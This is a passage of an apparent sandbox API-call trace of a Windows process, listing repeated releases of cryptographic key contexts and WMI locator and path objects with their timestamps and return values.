(hKey=0xb7fa10) returned 1 [0179.310] CryptReleaseContext (hProv=0x66bab80, dwFlags=0x0) returned 1 [0179.310] CryptReleaseContext (hProv=0x66bab80, dwFlags=0x0) returned 1 [0181.216] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0181.216] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0181.216] WbemLocator:IUnknown:Release (This=0x60277b0) returned 0x1 [0181.216] WbemLocator:IUnknown:Release (This=0x60277b0) returned 0x0 [0181.217] CryptDestroyKey (hKey=0xb7f390) returned 1 [0181.217] CryptReleaseContext (hProv=0x66bac08, dwFlags=0x0) returned 1 [0181.217] CryptReleaseContext (hProv=0x66bac08, dwFlags=0x0) returned 1 [0181.217] CryptDestroyKey (hKey=0xb7f190) returned 1 [0181.217] CryptReleaseContext (hProv=0x66bae28, dwFlags=0x0) returned 1 [0181.217] CryptReleaseContext (hProv=0x66bae28, dwFlags=0x0) returned 1 [0182.943] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0182.943] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0182.943] WbemLocator:IUnknown:Release (This=0x6027810) returned 0x1 [0182.943] WbemLocator:IUnknown:Release (This=0x6027810) returned 0x0 [0182.944] IUnknown:Release (This=0x6028978) returned 0x0 [0182.944] IUnknown:Release (This=0x60287e0) returned 0x0 [0182.945] CryptDestroyKey (hKey=0xb7f610) returned 1 [0182.945] CryptReleaseContext (hProv=0x66bab80, dwFlags=0x0) returned 1 [0182.945] CryptReleaseContext (hProv=0x66bab80, dwFlags=0x0) returned 1 [0182.945] CryptDestroyKey (hKey=0xb7f190) returned 1 [0182.945] CryptReleaseContext (hProv=0x66baa70, dwFlags=0x0) returned 1 [0182.946] CryptReleaseContext (hProv=0x66baa70, dwFlags=0x0) returned 1 [0182.948] CryptDestroyKey (hKey=0xb7f650) returned 1 [0182.948] CryptReleaseContext (hProv=0x66baeb0, dwFlags=0x0) returned 1 [0182.948] CryptReleaseContext (hProv=0x66baeb0, dwFlags=0x0) returned 1 [0184.443] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0184.443] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.443] WbemLocator:IUnknown:Release (This=0xb5b604) returned 0x1 [0184.443] WbemLocator:IUnknown:Release (This=0x6024594) returned 0x0 [0184.500] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.500] WbemLocator:IUnknown:Release (This=0xb5b514) returned 0x1 [0184.500] WbemLocator:IUnknown:Release (This=0x6010d04) returned 0x0 [0184.502] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.502] WbemLocator:IUnknown:Release (This=0x60277f0) returned 0x1 [0184.502] WbemLocator:IUnknown:Release (This=0x60277f0) returned 0x0 [0184.503] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.503] WbemLocator:IUnknown:Release (This=0xb5b424) returned 0x1 [0184.503] WbemLocator:IUnknown:Release (This=0x6024694) returned 0x0 [0184.504] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.504] WbemLocator:IUnknown:Release (This=0xb5b154) returned 0x1 [0184.504] WbemLocator:IUnknown:Release (This=0x602453c) returned 0x0 [0184.522] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.522] WbemLocator:IUnknown:Release (This=0xb5b064) returned 0x1 [0184.522] WbemLocator:IUnknown:Release (This=0x6010c64) returned 0x0 [0184.523] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.523] WbemLocator:IUnknown:Release (This=0xb5a9d4) returned 0x1 [0184.523] WbemLocator:IUnknown:Release (This=0x603305c) returned 0x0 [0184.526] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.526] WbemLocator:IUnknown:Release (This=0xb5b6f4) returned 0x1 [0184.526] WbemLocator:IUnknown:Release (This=0x6033164) returned 0x0 [0184.527] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.527] WbemLocator:IUnknown:Release (This=0xb5ae84) returned 0x1 [0184.527] WbemLocator:IUnknown:Release (This=0x601ffe4) returned 0x0 [0184.546] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.546] WbemLocator:IUnknown:Release (This=0xb5af74) returned 0x1 [0184.546] WbemLocator:IUnknown:Release (This=0x6029c14) returned 0x0 [0184.546] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.546] WbemLocator:IUnknown:Release (This=0xb5ad94) returned 0x1 [0184.546] WbemLocator:IUnknown:Release (This=0x601ccec) returned 0x0 [0184.547] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.547] WbemLocator:IUnknown:Release (This=0xb5aca4) returned 0x1 [0184.547] WbemLocator:IUnknown:Release (This=0x601ff44) returned 0x0 [0184.547] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.548] WbemLocator:IUnknown:Release (This=0xb5aac4) returned 0x1 [0184.548] WbemLocator:IUnknown:Release (This=0x601089c) returned 0x0 [0184.548] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.548] WbemLocator:IUnknown:Release (This=0xb5a8e4) returned 0x1 [0184.548] WbemLocator:IUnknown:Release (This=0x601cc4c) returned 0x0 [0184.549] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.549] WbemLocator:IUnknown:Release (This=0x66b26dc) returned 0x1 [0184.549] WbemLocator:IUnknown:Release (This=0x6033214) returned 0x0 [0184.549] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.549] WbemLocator:IUnknown:Release (This=0xb5bf64) returned 0x1 [0184.550] WbemLocator:IUnknown:Release (This=0x60331bc) returned 0x0 [0184.550] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.550] WbemLocator:IUnknown:Release (This=0x66b28bc) returned 0x1 [0184.550] WbemLocator:IUnknown:Release (This=0x60332c4) returned 0x0 [0184.831] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.831] WbemLocator:IUnknown:Release (This=0x66b27cc) returned 0x1 [0184.831] WbemLocator:IUnknown:Release (This=0x603326c) returned 0x0 [0184.835] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.835] WbemLocator:IUnknown:Release (This=0xb5bd84) returned 0x1 [0184.835] WbemLocator:IUnknown:Release (This=0x603310c) returned 0x0 [0184.838] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.838] WbemLocator:IUnknown:Release (This=0x66b29ac) returned 0x1 [0184.838] WbemLocator:IUnknown:Release (This=0x603331c) returned 0x0 [0184.846] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.847] WbemLocator:IUnknown:Release (This=0xb5b334) returned 0x1 [0184.847] WbemLocator:IUnknown:Release (This=0x60330b4) returned 0x0 [0184.850] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0184.850] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.850] WbemDefPath:IUnknown:Release (This=0x6030940) returned 0x1 [0184.850] WbemDefPath:IUnknown:Release (This=0x6030940) returned 0x0 [0184.850] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.851] WbemDefPath:IUnknown:Release (This=0x6025c30) returned 0x1 [0184.851] WbemDefPath:IUnknown:Release (This=0x6025c30) returned 0x0 [0184.851] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.851] WbemDefPath:IUnknown:Release (This=0x6025bc0) returned 0x1 [0184.851] WbemDefPath:IUnknown:Release (This=0x6025bc0) returned 0x0 [0184.851] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.851] WbemDefPath:IUnknown:Release (This=0x6025b50) returned 0x1 [0184.851] WbemDefPath:IUnknown:Release (This=0x6025b50) returned 0x0 [0184.851] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.851] WbemDefPath:IUnknown:Release (This=0x6025ae0) returned 0x1 [0184.851] WbemDefPath:IUnknown:Release (This=0x6025ae0) returned 0x0 [0184.851] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.851] WbemDefPath:IUnknown:Release (This=0x6025a70) returned 0x1 [0184.851] WbemDefPath:IUnknown:Release (This=0x6025a70) returned 0x0 [0184.851] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.851] WbemDefPath:IUnknown:Release (This=0x6025a00) returned 0x1 [0184.851] WbemDefPath:IUnknown:Release (This=0x6025a00) returned 0x0 [0184.851] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.851] WbemDefPath:IUnknown:Release (This=0x6025300) returned 0x1 [0184.851] WbemDefPath:IUnknown:Release (This=0x6025300) returned 0x0 [0184.851] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.851] WbemDefPath:IUnknown:Release (This=0x6025370) returned 0x1 [0184.851] WbemDefPath:IUnknown:Release (This=0x6025370) returned 0x0 [0184.852] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.852] WbemDefPath:IUnknown:Release (This=0x60253e0) returned 0x1 [0184.852] WbemDefPath:IUnknown:Release (This=0x60253e0) returned 0x0 [0184.852] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.852] WbemDefPath:IUnknown:Release (This=0x6025450) returned 0x1 [0184.852] WbemDefPath:IUnknown:Release (This=0x6025450) returned 0x0 [0184.852] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.852] WbemDefPath:IUnknown:Release (This=0x6025530) returned 0x1 [0184.852] WbemDefPath:IUnknown:Release (This=0x6025530) returned 0x0 [0184.852] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.852] WbemDefPath:IUnknown:Release (This=0x60254c0) returned 0x1 [0184.852] WbemDefPath:IUnknown:Release (This=0x60254c0) returned 0x0 [0184.852] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.852] WbemDefPath:IUnknown:Release (This=0x60255a0) returned 0x1 [0184.852] WbemDefPath:IUnknown:Release (This=0x60255a0) returned 0x0 [0184.852] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.852] WbemDefPath:IUnknown:Release (This=0x6025610) returned 0x1 [0184.852] WbemDefPath:IUnknown:Release (This=0x6025610) returned 0x0 [0184.852] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.852] WbemDefPath:IUnknown:Release (This=0x6025680) returned 0x1 [0184.852] WbemDefPath:IUnknown:Release (This=0x6025680) returned 0x0 [0184.852] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.852] WbemDefPath:IUnknown:Release (This=0x60256f0) returned 0x1 [0184.852] WbemDefPath:IUnknown:Release (This=0x60256f0) returned 0x0 [0184.853] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.853] WbemDefPath:IUnknown:Release (This=0x6025760) returned 0x1 [0184.853] WbemDefPath:IUnknown:Release (This=0x6025760) returned 0x0 [0184.853] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.853] WbemDefPath:IUnknown:Release (This=0x6030630) returned 0x1 [0184.853] WbemDefPath:IUnknown:Release (This=0x6030630) returned 0x0 [0184.853] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.853] WbemDefPath:IUnknown:Release (This=0x6025840) returned 0x1 [0184.853] WbemDefPath:IUnknown:Release (This=0x6025840) returned 0x0 [0184.853] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.853] WbemDefPath:IUnknown:Release (This=0x60258b0) returned 0x1 [0184.853] WbemDefPath:IUnknown:Release (This=0x60258b0) returned 0x0 [0184.853] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.853] WbemDefPath:IUnknown:Release (This=0x6025990) returned 0x1 [0184.853] WbemDefPath:IUnknown:Release (This=0x6025990) returned 0x0 [0184.853] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.853] WbemDefPath:IUnknown:Release (This=0x60257d0) returned 0x1 [0184.853] WbemDefPath:IUnknown:Release (This=0x60257d0) returned 0x0 [0184.853] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.853] WbemDefPath:IUnknown:Release (This=0x6025920) returned 0x1 [0184.853] WbemDefPath:IUnknown:Release (This=0x6025920) returned 0x0 [0184.853] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.853] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x1 [0184.853] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x0 [0184.854] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.854] WbemDefPath:IUnknown:Release (This=0x6030b00) returned 0x1 [0184.854] WbemDefPath:IUnknown:Release (This=0x6030b00) returned 0x0 [0184.854] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.854] WbemDefPath:IUnknown:Release (This=0x60309b0) returned 0x1 [0184.854] WbemDefPath:IUnknown:Release (This=0x60309b0) returned 0x0 [0184.854] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.854] WbemDefPath:IUnknown:Release (This=0x6030a20) returned 0x1 [0184.854] WbemDefPath:IUnknown:Release (This=0x6030a20) returned 0x0 [0184.854] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.854] WbemDefPath:IUnknown:Release (This=0x6030a90) returned 0x1 [0184.854] WbemDefPath:IUnknown:Release (This=0x6030a90) returned 0x0 [0184.854] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.854] WbemDefPath:IUnknown:Release (This=0x6030860) returned 0x1 [0184.854] WbemDefPath:IUnknown:Release (This=0x6030860) returned 0x0 [0184.854] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.854] WbemDefPath:IUnknown:Release (This=0x60308d0) returned 0x1 [0184.854] WbemDefPath:IUnknown:Release (This=0x60308d0) returned 0x0 [0184.854] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.854] WbemDefPath:IUnknown:Release (This=0x6030b70) returned 0x1 [0184.854] WbemDefPath:IUnknown:Release (This=0x6030b70) returned 0x0 [0184.854] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.854] WbemDefPath:IUnknown:Release (This=0x6030be0) returned 0x1 [0184.854] WbemDefPath:IUnknown:Release (This=0x6030be0) returned 0x0 [0184.855] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.855] WbemDefPath:IUnknown:Release (This=0x6030c50) returned 0x1 [0184.855] WbemDefPath:IUnknown:Release (This=0x6030c50) returned 0x0 [0184.855] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.855] WbemDefPath:IUnknown:Release (This=0x6030cc0) returned 0x1 [0184.855] WbemDefPath:IUnknown:Release (This=0x6030cc0) returned 0x0 [0184.855] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.855] WbemDefPath:IUnknown:Release (This=0x6030d30) returned 0x1 [0184.855] WbemDefPath:IUnknown:Release (This=0x6030d30) returned 0x0 [0184.855] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.855] WbemDefPath:IUnknown:Release (This=0x6030da0) returned 0x1 [0184.855] WbemDefPath:IUnknown:Release (This=0x6030da0) returned 0x0 [0184.855] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.855] WbemDefPath:IUnknown:Release (This=0x6030e10) returned 0x1 [0184.855] WbemDefPath:IUnknown:Release (This=0x6030e10) returned 0x0 [0184.855] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.855] WbemDefPath:IUnknown:Release (This=0x6030e80) returned 0x1 [0184.855] WbemDefPath:IUnknown:Release (This=0x6030e80) returned 0x0 [0184.855] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0184.855] WbemDefPath:IUnknown:Release (This=0x6030ef0) returned 0x1 [0184.855] WbemDefPath:IUnknown:Release (This=0x6030ef0) returned 0x0 [0184.855] IUnknown:Release (This=0x6028648) returned 0x0 [0184.856] CryptDestroyKey (hKey=0xb7f890) returned 1 [0184.856] CryptReleaseContext (hProv=0x66bb158, dwFlags=0x0) returned 1 [0184.856] CryptReleaseContext (hProv=0x66bb158, dwFlags=0x0) returned 1 [0184.857] CryptDestroyKey (hKey=0xb7f650) returned 1 [0184.857] CryptReleaseContext (hProv=0x66bafc0, dwFlags=0x0) returned 1 [0184.857] CryptReleaseContext (hProv=0x66bafc0, dwFlags=0x0) returned 1 [0185.068] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0185.068] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0185.068] WbemLocator:IUnknown:Release (This=0x6027870) returned 0x1 [0185.068] WbemLocator:IUnknown:Release (This=0x6027870) returned 0x0 [0185.861] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0185.861] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0185.861] WbemLocator:IUnknown:Release (This=0x6027800) returned 0x1 [0185.861] WbemLocator:IUnknown:Release (This=0x6027800) returned 0x0 [0185.861] IUnknown:Release (This=0x6028648) returned 0x0 [0185.861] CryptDestroyKey (hKey=0xb7fb90) returned 1 [0185.861] CryptReleaseContext (hProv=0x66bb1e0, dwFlags=0x0) returned 1 [0185.862] CryptDestroyKey (hKey=0xb7f210) returned 1 [0185.862] CryptReleaseContext (hProv=0x66bb048, dwFlags=0x0) returned 1 [0185.862] CryptReleaseContext (hProv=0x66bb048, dwFlags=0x0) returned 1 [0185.862] CryptReleaseContext (hProv=0x66bb1e0, dwFlags=0x0) returned 1 [0185.862] CryptDestroyKey (hKey=0xb7f650) returned 1 [0185.862] CryptReleaseContext (hProv=0x66bb0d0, dwFlags=0x0) returned 1 [0185.862] CryptReleaseContext (hProv=0x66bb0d0, dwFlags=0x0) returned 1 [0186.360] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0186.360] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0186.360] WbemLocator:IUnknown:Release (This=0x6027720) returned 0x1 [0186.360] WbemLocator:IUnknown:Release (This=0x6027720) returned 0x0 [0186.360] CryptDestroyKey (hKey=0xb7f790) returned 1 [0186.361] CryptReleaseContext (hProv=0xbdf8c0, dwFlags=0x0) returned 1 [0186.361] CryptReleaseContext (hProv=0xbdf8c0, dwFlags=0x0) returned 1 [0186.361] CryptDestroyKey (hKey=0xb7f750) returned 1 [0186.361] CryptReleaseContext (hProv=0xbe00b8, dwFlags=0x0) returned 1 [0186.361] CryptReleaseContext (hProv=0xbe00b8, dwFlags=0x0) returned 1 [0187.727] CryptDestroyKey (hKey=0xb7f4d0) returned 1 [0187.727] CryptReleaseContext (hProv=0x66bb048, dwFlags=0x0) returned 1 [0187.727] CryptReleaseContext (hProv=0x66bb048, dwFlags=0x0) returned 1 [0188.653] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0188.653] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0188.653] WbemLocator:IUnknown:Release (This=0xb5bd84) returned 0x1 [0188.653] WbemLocator:IUnknown:Release (This=0x603331c) returned 0x0 [0188.794] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0188.794] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0188.794] WbemDefPath:IUnknown:Release (This=0x6031190) returned 0x1 [0188.794] WbemDefPath:IUnknown:Release (This=0x6031190) returned 0x0 [0188.794] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0188.794] WbemDefPath:IUnknown:Release (This=0x6031120) returned 0x1 [0188.794] WbemDefPath:IUnknown:Release (This=0x6031120) returned 0x0 [0188.794] IUnknown:Release (This=0x6028648) returned 0x0 [0188.794] IUnknown:Release (This=0x60287e0) returned 0x0 [0188.794] IUnknown:Release (This=0x6028978) returned 0x0 [0188.795] CryptDestroyKey (hKey=0xb7f4d0) returned 1 [0188.795] CryptReleaseContext (hProv=0x66bb0d0, dwFlags=0x0) returned 1 [0188.795] CryptReleaseContext (hProv=0x66bb0d0, dwFlags=0x0) returned 1 [0192.727] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0192.727] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0192.727] WbemLocator:IUnknown:Release (This=0x6027730) returned 0x1 [0192.727] WbemLocator:IUnknown:Release (This=0x6027730) returned 0x0 [0192.728] CryptDestroyKey (hKey=0xb7f390) returned 1 [0192.728] CryptReleaseContext (hProv=0xbdf8c0, dwFlags=0x0) returned 1 [0192.728] CryptReleaseContext (hProv=0xbdf8c0, dwFlags=0x0) returned 1 [0192.728] CryptDestroyKey (hKey=0xb7f310) returned 1 [0192.728] CryptReleaseContext (hProv=0x66bb048, dwFlags=0x0) returned 1 [0192.728] CryptDestroyKey (hKey=0xb7f5d0) returned 1 [0192.728] CryptReleaseContext (hProv=0xbe00b8, dwFlags=0x0) returned 1 [0192.729] CryptReleaseContext (hProv=0xbe00b8, dwFlags=0x0) returned 1 [0192.729] CryptReleaseContext (hProv=0x66bb048, dwFlags=0x0) returned 1 [0193.339] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0193.339] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0193.339] WbemLocator:IUnknown:Release (This=0x6027780) returned 0x1 [0193.339] WbemLocator:IUnknown:Release (This=0x6027780) returned 0x0 [0193.340] CryptDestroyKey (hKey=0xb7fa50) returned 1 [0193.340] CryptReleaseContext (hProv=0x66ba498, dwFlags=0x0) returned 1 [0193.340] CryptReleaseContext (hProv=0x66ba498, dwFlags=0x0) returned 1 [0194.285] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0194.285] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0194.285] WbemLocator:IUnknown:Release (This=0x60275f0) returned 0x1 [0194.285] WbemLocator:IUnknown:Release (This=0x60275f0) returned 0x0 [0194.285] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0194.285] WbemLocator:IUnknown:Release (This=0x60277d0) returned 0x1 [0194.285] WbemLocator:IUnknown:Release (This=0x60277d0) returned 0x0 [0194.285] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0194.285] WbemLocator:IUnknown:Release (This=0x60276e0) returned 0x1 [0194.285] WbemLocator:IUnknown:Release (This=0x60276e0) returned 0x0 [0194.285] CryptDestroyKey (hKey=0xb7f610) returned 1 [0194.285] CryptReleaseContext (hProv=0x66ba6b8, dwFlags=0x0) returned 1 [0194.285] CryptReleaseContext (hProv=0x66ba6b8, dwFlags=0x0) returned 1 [0194.286] CryptDestroyKey (hKey=0xb7f810) returned 1 [0194.286] CryptReleaseContext (hProv=0x66bafc0, dwFlags=0x0) returned 1 [0194.286] CryptDestroyKey (hKey=0xb7f3d0) returned 1 [0194.286] CryptReleaseContext (hProv=0x66ba8d8, dwFlags=0x0) returned 1 [0194.286] CryptDestroyKey (hKey=0xb7fa50) returned 1 [0194.286] CryptReleaseContext (hProv=0x66bb0d0, dwFlags=0x0) returned 1 [0194.286] CryptReleaseContext (hProv=0x66bb0d0, dwFlags=0x0) returned 1 [0194.286] CryptReleaseContext (hProv=0x66ba8d8, dwFlags=0x0) returned 1 [0194.286] CryptReleaseContext (hProv=0x66bafc0, dwFlags=0x0) returned 1 [0195.548] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0195.548] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0195.548] WbemLocator:IUnknown:Release (This=0x60278b0) returned 0x1 [0195.548] WbemLocator:IUnknown:Release (This=0x60278b0) returned 0x0 [0195.548] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0195.548] WbemLocator:IUnknown:Release (This=0x60275e0) returned 0x1 [0195.548] WbemLocator:IUnknown:Release (This=0x60275e0) returned 0x0 [0195.548] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0195.548] WbemLocator:IUnknown:Release (This=0x6027690) returned 0x1 [0195.548] WbemLocator:IUnknown:Release (This=0x6027690) returned 0x0 [0195.549] IUnknown:Release (This=0x6027cb8) returned 0x0 [0195.549] IUnknown:Release (This=0x6027b20) returned 0x0 [0195.549] IUnknown:Release (This=0x6028180) returned 0x0 [0195.549] IUnknown:Release (This=0x6028648) returned 0x0 [0195.549] IUnknown:Release (This=0x6028b10) returned 0x0 [0195.549] IUnknown:Release (This=0x60287e0) returned 0x0 [0195.549] IUnknown:Release (This=0x6027fe8) returned 0x0 [0195.550] CryptReleaseContext (hProv=0x66bb598, dwFlags=0x0) returned 1 [0195.551] CryptDestroyKey (hKey=0xb7fa50) returned 1 [0195.551] CryptReleaseContext (hProv=0x66bb488, dwFlags=0x0) returned 1 [0195.551] CryptReleaseContext (hProv=0x66bb488, dwFlags=0x0) returned 1 [0195.552] CryptDestroyKey (hKey=0xb7fd10) returned 1 [0195.552] CryptReleaseContext (hProv=0x66bb950, dwFlags=0x0) returned 1 [0195.552] CryptReleaseContext (hProv=0x66bb950, dwFlags=0x0) returned 1 [0195.552] CryptDestroyKey (hKey=0xb7f850) returned 1 [0195.552] CryptReleaseContext (hProv=0x66bafc0, dwFlags=0x0) returned 1 [0195.553] CryptDestroyKey (hKey=0xb7f110) returned 1 [0195.553] CryptReleaseContext (hProv=0x66bb510, dwFlags=0x0) returned 1 [0195.553] CryptReleaseContext (hProv=0x66bb510, dwFlags=0x0) returned 1 [0195.553] CryptReleaseContext (hProv=0x66bafc0, dwFlags=0x0) returned 1 [0195.553] CryptDestroyKey (hKey=0xb7f490) returned 1 [0195.553] CryptReleaseContext (hProv=0x66bb598, dwFlags=0x0) returned 1 [0195.876] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0195.876] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0195.876] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x1 [0195.876] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x0 [0195.876] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0195.876] WbemDefPath:IUnknown:Release (This=0x6030b00) returned 0x1 [0195.876] WbemDefPath:IUnknown:Release (This=0x6030b00) returned 0x0 [0195.876] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0195.876] WbemDefPath:IUnknown:Release (This=0x60309b0) returned 0x1 [0195.876] WbemDefPath:IUnknown:Release (This=0x60309b0) returned 0x0 [0195.877] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0195.877] WbemDefPath:IUnknown:Release (This=0x6030a20) returned 0x1 [0195.877] WbemDefPath:IUnknown:Release (This=0x6030a20) returned 0x0 [0195.877] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0195.877] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0195.877] WbemLocator:IUnknown:Release (This=0xb5a9d4) returned 0x1 [0195.877] WbemLocator:IUnknown:Release (This=0x60334d4) returned 0x0 [0196.131] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0196.131] WbemLocator:IUnknown:Release (This=0xb5bd84) returned 0x1 [0196.131] WbemLocator:IUnknown:Release (This=0x603305c) returned 0x0 [0196.133] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) 